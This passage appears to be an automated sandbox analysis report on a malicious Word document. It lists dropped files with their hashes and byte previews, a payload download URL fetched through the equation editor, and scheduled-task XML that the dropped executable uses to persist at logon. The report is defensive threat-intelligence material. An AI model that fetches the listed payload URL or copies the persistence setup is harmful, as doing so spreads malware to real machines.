                                                                                                        Process:C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):290
                                                                                                        Entropy (8bit):2.9542848029467006
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:kkFklhalfllXlE/vSw//aX6pFRltB+SliQlP8F+RlTRe86A+iRlERMta9b3+ALxn:kKedhN+SkQlPlEGYRMY9z+4KlDA3RUe/
                                                                                                        MD5:EAB8ABAF788A7608F0F06C31E65CB219
                                                                                                        SHA1:6CF0F0F6E33CA502D6127177FB854DB2A5F69279
                                                                                                        SHA-256:39C1500E8E3788E98B9E11C565D579DFA073B78101A2F5852FFC0EC99DE9A2F2
                                                                                                        SHA-512:EA74D00CA62C0143C5940B9A1A2A5FBB785CCFC183A69961793331304D27AB297E4A3965AB1C6CC02535D29203AB7AB4C45779E6DA18FFACF16FCA0141D7EA61
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview: p...... ............0...(....................................................... ...........^.......................h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...
                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\booobb[1].exe
                                                                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):620544
                                                                                                        Entropy (8bit):7.268455383222599
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:OYvkyLE7QsAUUURvTv4qwL7t7raAqZgRwHdVSBKQpFPENgNi8:OYvTEjA/UFA1t3yZMwHd4BKUE6
                                                                                                        MD5:60997F0CBBC87CE8E5581B38C39F78B7
                                                                                                        SHA1:B3C846434A3139DFADB44E99380B4DDDBF8B5A99
                                                                                                        SHA-256:744CD8972EA91D90724010FC63AF41933E9C61728560A17224C95C474D9E4B7F
                                                                                                        SHA-512:8D8F0030718573D864C635A1CEF691405654B12F6A02345F0A437D45233D50613310D67D9EF8E8A97A582BADEDA4554D3A62654210D35B2692F673D9963C3269
                                                                                                        Malicious:true
                                                                                                        Reputation:low
                                                                                                        IE Cache URL:http://sauberprint.com/lupin/booobb.exe
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Yga..............0..`............... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text....`... ...`.................. ..`.rsrc................b..............@..@.reloc...............v..............@..B........................H........n...`..........................................................&.(......*...0..m......... ...L......+J..l#.......@..Y.Yl(...........,!......#.......@..Y.Yl(....iY...+........X....i......-....+...*....0..C............+*.........,..#.......@..i.Y.Yl(....iX....X....i....-....+...*..0..4..........N......r...p...r[..p.......,.......+.........+..*.0..@..........(......(.....rm..p(.....(......r...p.o.........,..........-.*n...(.....r...p(.....( ....*.0.............s........
                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8B643B49-3C8D-42A4-9902-607278FF94D5}.tmp
                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1024
                                                                                                        Entropy (8bit):0.05390218305374581
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:ol3lYdn:4Wn
                                                                                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                        Malicious:false
                                                                                                        Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AF3AB24E-3542-4509-8BA0-DBB1FB855F6C}.tmp
                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1024
                                                                                                        Entropy (8bit):1.909463588908339
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:Xloip/Wl1NxhHel1KbZxTGuXku3qkuQNgREqAWlgFJAl/jlll8vlw2FrA:irl11+3KlRjk5uFJAl/buvq2ZA
                                                                                                        MD5:9BF30A4E705749D42C45E0B4FF025DE7
                                                                                                        SHA1:EA970269C62BB3E608161BC24621315954BFFD25
                                                                                                        SHA-256:4B7BF20C670352F56523E143398C26A0BBDE7ED4647A8FE7FEC0877DF731C0A8
                                                                                                        SHA-512:E128A1501D82AAA4A66A63CF260C9A56B9F867B99A9D121250FC4EE8B21FAA225B5AA43B1C6943EAF26694CBDD3C63D46EAB23ED88AF2EC91D4C7C30BB76DA43
                                                                                                        Malicious:false
                                                                                                        Preview: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ._. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .0.v.0.y.M.V.U.2.w.l.5.P.S.Y.x.I.b.q.5.C.F.9.h.5.k._.B.3.h.D.s.u.b.J.K.Z.r.5.V.h.l.l.b.F.o.r.r.5.d.Y.X.3.6.H.9.4.l.X.4.c.P.u.D.U.1.X.7.h.w.Y.9.e.8.y.4. . . . . . . . . . . . .2.0.9.8.2.0.9.8.1.2.0.9.8.2.0.9.8.1.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ
                                                                                                        C:\Users\user\AppData\Local\Temp\CabB7AE.tmp
                                                                                                        Process:C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe
                                                                                                        File Type:Microsoft Cabinet archive data, 61157 bytes, 1 file
                                                                                                        Category:dropped
                                                                                                        Size (bytes):61157
                                                                                                        Entropy (8bit):7.995991509218449
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:1536:ppUkcaDREfLNPj1tHqn+ZQgYXAMxCbG0Ra0HMSAKMgAAaE1k:7UXaDR0NPj1Vi++xQFa07sTgAQ1k
                                                                                                        MD5:AB5C36D10261C173C5896F3478CDC6B7
                                                                                                        SHA1:87AC53810AD125663519E944BC87DED3979CBEE4
                                                                                                        SHA-256:F8E90FB0557FE49D7702CFB506312AC0B24C97802F9C782696DB6D47F434E8E9
                                                                                                        SHA-512:E83E4EAE44E7A9CBCD267DBFC25A7F4F68B50591E3BBE267324B1F813C9220D565B284994DED5F7D2D371D50E1EBFA647176EC8DE9716F754C6B5785C6E897FA
                                                                                                        Malicious:false
                                                                                                        Preview: MSCF............,...................I........t........*S{I .authroot.stl..p.(.5..CK..8U....u.}M7{v!.\D.u.....F.eWI.!e..B2QIR..$4.%.3eK$J. ......9w4...=.9..}...~....$..h..ye.A..;....|. O6.a0xN....9..C..t.z.,..d`.c...(5.....<..1.|..2.1.0.g.4yw..eW.#.x....+.oF....8.t...Y....q.M.....HB.^y^a...)..GaV"|..+.'..f..V.y.b.V.PV......`..9+..\0.g...!.s..a....Q...........~@$.....8..(g..tj....=,V)v.s.d.].xqX4.....s....K..6.tH.....p~.2..!..<./X......r.. ?(.\[. H...#?.H.".. p.V.}.`L...P0.y....|...A..(...&..3.ag...c..7.T=....ip.Ta..F.....'..BsV...0.....f....Lh.f..6....u.....Mqm.,...@.WZ.={,;.J...)...{_Ao....T......xJmH.#..>.f..RQT.Ul(..AV..|.!k0...|\......U2U..........,9..+.\R..(.[.'M........0.o..,.t.#..>y.!....!X<o.....w...'......a.'..og+>..|.s.g.Wr.2K.=...5.YO.E.V.....`.O..[.d.....c..g....A..=....k..u2..Y.}.......C...\=...&...U.e...?...z.'..$..fj.'|.c....4y.".T.....X....@xpQ.,.q.."...t.... $.F..O.A.o_}d.3...z...F?..-...Fy...W#...1......T.3....x.
                                                                                                        C:\Users\user\AppData\Local\Temp\TarB7AF.tmp
                                                                                                        Process:C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe
                                                                                                        File Type:data
                                                                                                        Category:modified
                                                                                                        Size (bytes):161007
                                                                                                        Entropy (8bit):6.301962759942683
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:GlOXleUp8R73k/99oFr+yQNujWNWv+1w/A/rHeGyjYPjCQaZsmt6QNGbM:G4X78RcqhQNujZv+mQjCjZsy0M
                                                                                                        MD5:E9E21888D1DC2348DEE343980E7188FA
                                                                                                        SHA1:16C335FD6139A5D795C0DD16B2D5831160B0F98E
                                                                                                        SHA-256:3D249DB46B4BD1CFAE8F56B272F7116B218AC9D64225D1109751EE487FA9F3AE
                                                                                                        SHA-512:83FE7829CB08CA9588D8109F3361F0DEABEC4842D5C478A21DEC9069A08F6FE84BDC500920D834B55B66ED018EFAFB87BDC92AAF8E0D99E774E420EE74BF4305
                                                                                                        Malicious:false
                                                                                                        Preview: 0..t...*.H.........t.0..t....1.0...`.H.e......0..d...+.....7.....d.0..d.0...+.....7........^<.q...210910160929Z0...+......0..d.0..D.....`...@.,..0..0.r1..*0...+.....7..h1......+h...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o
                                                                                                        C:\Users\user\AppData\Local\Temp\tmp10D3.tmp
                                                                                                        Process:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1622
                                                                                                        Entropy (8bit):5.147654992123486
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBVPtn:cbhZ7ClNQi/rydbz9I3YODOLNdq3J
                                                                                                        MD5:AE1D4A49F73DDDCB4AA89C51C6DA6E77
                                                                                                        SHA1:1CE4210C009D729ACF3C93AF2B7C9D5AD17F359D
                                                                                                        SHA-256:592763F6CC13672AB81ED34E5055CD254BE528AAC3F31DD67309F4B03DA68004
                                                                                                        SHA-512:B3CC11AD86BF73464353FF70D8EEAA85B36410792853DD0926D7D64360D26F92E825DD4481DE413EB1AB157DB96408F24DB128F5BD980B4D1DF9CA139B0DA2D2
                                                                                                        Malicious:false
                                                                                                        Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                                                        C:\Users\user\AppData\Local\Temp\tmp7B0A.tmp
                                                                                                        Process:C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe
                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1622
                                                                                                        Entropy (8bit):5.147654992123486
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBVPtn:cbhZ7ClNQi/rydbz9I3YODOLNdq3J
                                                                                                        MD5:AE1D4A49F73DDDCB4AA89C51C6DA6E77
                                                                                                        SHA1:1CE4210C009D729ACF3C93AF2B7C9D5AD17F359D
                                                                                                        SHA-256:592763F6CC13672AB81ED34E5055CD254BE528AAC3F31DD67309F4B03DA68004
                                                                                                        SHA-512:B3CC11AD86BF73464353FF70D8EEAA85B36410792853DD0926D7D64360D26F92E825DD4481DE413EB1AB157DB96408F24DB128F5BD980B4D1DF9CA139B0DA2D2
                                                                                                        Malicious:true
                                                                                                        Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                                                        C:\Users\user\AppData\Local\Temp\tmpEC63.tmp
                                                                                                        Process:C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1622
                                                                                                        Entropy (8bit):5.147654992123486
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBVPtn:cbhZ7ClNQi/rydbz9I3YODOLNdq3J
                                                                                                        MD5:AE1D4A49F73DDDCB4AA89C51C6DA6E77
                                                                                                        SHA1:1CE4210C009D729ACF3C93AF2B7C9D5AD17F359D
                                                                                                        SHA-256:592763F6CC13672AB81ED34E5055CD254BE528AAC3F31DD67309F4B03DA68004
                                                                                                        SHA-512:B3CC11AD86BF73464353FF70D8EEAA85B36410792853DD0926D7D64360D26F92E825DD4481DE413EB1AB157DB96408F24DB128F5BD980B4D1DF9CA139B0DA2D2
                                                                                                        Malicious:false
                                                                                                        Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                                                        C:\Users\user\AppData\Local\Temp\tmpG796.tmp (copy)
                                                                                                        Process:C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):620544
                                                                                                        Entropy (8bit):7.268455383222599
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:OYvkyLE7QsAUUURvTv4qwL7t7raAqZgRwHdVSBKQpFPENgNi8:OYvTEjA/UFA1t3yZMwHd4BKUE6
                                                                                                        MD5:60997F0CBBC87CE8E5581B38C39F78B7
                                                                                                        SHA1:B3C846434A3139DFADB44E99380B4DDDBF8B5A99
                                                                                                        SHA-256:744CD8972EA91D90724010FC63AF41933E9C61728560A17224C95C474D9E4B7F
                                                                                                        SHA-512:8D8F0030718573D864C635A1CEF691405654B12F6A02345F0A437D45233D50613310D67D9EF8E8A97A582BADEDA4554D3A62654210D35B2692F673D9963C3269
                                                                                                        Malicious:false
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Yga..............0..`............... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text....`... ...`.................. ..`.rsrc................b..............@..@.reloc...............v..............@..B........................H........n...`..........................................................&.(......*...0..m......... ...L......+J..l#.......@..Y.Yl(...........,!......#.......@..Y.Yl(....iY...+........X....i......-....+...*....0..C............+*.........,..#.......@..i.Y.Yl(....iX....X....i....-....+...*..0..4..........N......r...p...r[..p.......,.......+.........+..*.0..@..........(......(.....rm..p(.....(......r...p.o.........,..........-.*n...(.....r...p(.....( ....*.0.............s........
                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Specification.LNK
                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:54 2021, mtime=Mon Aug 30 20:08:54 2021, atime=Thu Oct 14 16:27:12 2021, length=3803, window=hide
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1029
                                                                                                        Entropy (8bit):4.538702654638146
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:89l7C3gXg/XAlCPCHaX6zBFB/z+X+W1Q17OSjDq4icvbrKjVbl4/DmDtZ3YilMMN:8U/XTKz3cvQ17hjgepSDv3qmME/7Eg
                                                                                                        MD5:0AF318408E836BF951DE090716DCCC90
                                                                                                        SHA1:EC3F8E519AD817C6103094C71F942DCAFD678F3B
                                                                                                        SHA-256:A4DF79538FC02B32ACF423263363F6686EBFE953A233033F7C00F5005AA5E8E5
                                                                                                        SHA-512:A0DCF6C78A07C17312677AF7A4925366B8C51432313B44B2B717B491802EF8727121BFD66AB573C64811F60E1E6671DC9498195F7F1E481CCEEDE1CA8B8BCBCE
                                                                                                        Malicious:false
                                                                                                        Preview: L..................F.... ....u.=....u.=...h.0. ................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.....z.1......S....Desktop.d......QK.X.S..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....l.2.....NSg. .SPECIF~1.DOC..P.......S...S..*.........................S.p.e.c.i.f.i.c.a.t.i.o.n...d.o.c.......{...............-...8...[............?J......C:\Users\..#...................\\088753\Users.user\Desktop\Specification.doc.(.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.p.e.c.i.f.i.c.a.t.i.o.n...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......088753..........D_....3N...W...9..g............[D_....3
                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):77
                                                                                                        Entropy (8bit):4.559030541685695
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:bDuMJlu9MT4/pSmX1yAbT4/pSv:bCJhchhc
                                                                                                        MD5:B57B7337843A66DFF78A40E65E6D6CC3
                                                                                                        SHA1:C34B37C63EC82EA47FD39C2B381CF5654ED2720C
                                                                                                        SHA-256:5AA89D00A4566CDF39289C4FE178ADCE71D82F88B08CE4FDBE4F1BA65B26FDE3
                                                                                                        SHA-512:C5FA83E0C45183A486021979AEE6998D72960A22E201C663E68309BEFA575BD6E9349C35700EED709129674D44E0DE2A20921D6F00EECD4D42115375AF345CEC
                                                                                                        Malicious:false
                                                                                                        Preview: [folders]..Templates.LNK=0..Specification.LNK=0..[doc]..Specification.LNK=0..
                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):162
                                                                                                        Entropy (8bit):2.5038355507075254
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                                        MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                                        SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                                        SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                                        SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                                        Malicious:false
                                                                                                        Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                        File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2
                                                                                                        Entropy (8bit):1.0
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Qn:Qn
                                                                                                        MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                        Malicious:false
                                                                                                        Preview: ..
                                                                                                        C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe
                                                                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):620544
                                                                                                        Entropy (8bit):7.268455383222599
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:OYvkyLE7QsAUUURvTv4qwL7t7raAqZgRwHdVSBKQpFPENgNi8:OYvTEjA/UFA1t3yZMwHd4BKUE6
                                                                                                        MD5:60997F0CBBC87CE8E5581B38C39F78B7
                                                                                                        SHA1:B3C846434A3139DFADB44E99380B4DDDBF8B5A99
                                                                                                        SHA-256:744CD8972EA91D90724010FC63AF41933E9C61728560A17224C95C474D9E4B7F
                                                                                                        SHA-512:8D8F0030718573D864C635A1CEF691405654B12F6A02345F0A437D45233D50613310D67D9EF8E8A97A582BADEDA4554D3A62654210D35B2692F673D9963C3269
                                                                                                        Malicious:true
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Yga..............0..`............... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text....`... ...`.................. ..`.rsrc................b..............@..@.reloc...............v..............@..B........................H........n...`..........................................................&.(......*...0..m......... ...L......+J..l#.......@..Y.Yl(...........,!......#.......@..Y.Yl(....iY...+........X....i......-....+...*....0..C............+*.........,..#.......@..i.Y.Yl(....iX....X....i....-....+...*..0..4..........N......r...p...r[..p.......,.......+.........+..*.0..@..........(......(.....rm..p(.....(......r...p.o.........,..........-.*n...(.....r...p(.....( ....*.0.............s........
                                                                                                        C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                                                                                        Process:C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):620544
                                                                                                        Entropy (8bit):7.268455383222599
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:OYvkyLE7QsAUUURvTv4qwL7t7raAqZgRwHdVSBKQpFPENgNi8:OYvTEjA/UFA1t3yZMwHd4BKUE6
                                                                                                        MD5:60997F0CBBC87CE8E5581B38C39F78B7
                                                                                                        SHA1:B3C846434A3139DFADB44E99380B4DDDBF8B5A99
                                                                                                        SHA-256:744CD8972EA91D90724010FC63AF41933E9C61728560A17224C95C474D9E4B7F
                                                                                                        SHA-512:8D8F0030718573D864C635A1CEF691405654B12F6A02345F0A437D45233D50613310D67D9EF8E8A97A582BADEDA4554D3A62654210D35B2692F673D9963C3269
                                                                                                        Malicious:true
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Yga..............0..`............... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text....`... ...`.................. ..`.rsrc................b..............@..@.reloc...............v..............@..B........................H........n...`..........................................................&.(......*...0..m......... ...L......+J..l#.......@..Y.Yl(...........,!......#.......@..Y.Yl(....iY...+........X....i......-....+...*....0..C............+*.........,..#.......@..i.Y.Yl(....iX....X....i....-....+...*..0..4..........N......r...p...r[..p.......,.......+.........+..*.0..@..........(......(.....rm..p(.....(......r...p.o.........,..........-.*n...(.....r...p(.....( ....*.0.............s........
                                                                                                        C:\Users\user\AppData\Roaming\yxnDFepLbf.exe
                                                                                                        Process:C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):620544
                                                                                                        Entropy (8bit):7.268455383222599
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:OYvkyLE7QsAUUURvTv4qwL7t7raAqZgRwHdVSBKQpFPENgNi8:OYvTEjA/UFA1t3yZMwHd4BKUE6
                                                                                                        MD5:60997F0CBBC87CE8E5581B38C39F78B7
                                                                                                        SHA1:B3C846434A3139DFADB44E99380B4DDDBF8B5A99
                                                                                                        SHA-256:744CD8972EA91D90724010FC63AF41933E9C61728560A17224C95C474D9E4B7F
                                                                                                        SHA-512:8D8F0030718573D864C635A1CEF691405654B12F6A02345F0A437D45233D50613310D67D9EF8E8A97A582BADEDA4554D3A62654210D35B2692F673D9963C3269
                                                                                                        Malicious:false
                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Yga..............0..`............... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text....`... ...`.................. ..`.rsrc................b..............@..@.reloc...............v..............@..B........................H........n...`..........................................................&.(......*...0..m......... ...L......+J..l#.......@..Y.Yl(...........,!......#.......@..Y.Yl(....iY...+........X....i......-....+...*....0..C............+*.........,..#.......@..i.Y.Yl(....iX....X....i....-....+...*..0..4..........N......r...p...r[..p.......,.......+.........+..*.0..@..........(......(.....rm..p(.....(......r...p.o.........,..........-.*n...(.....r...p(.....( ....*.0.............s........
                                                                                                        C:\Users\user\Desktop\~$ecification.doc
                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):162
                                                                                                        Entropy (8bit):2.5038355507075254
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                                        MD5:45B1E2B14BE6C1EFC217DCE28709F72D
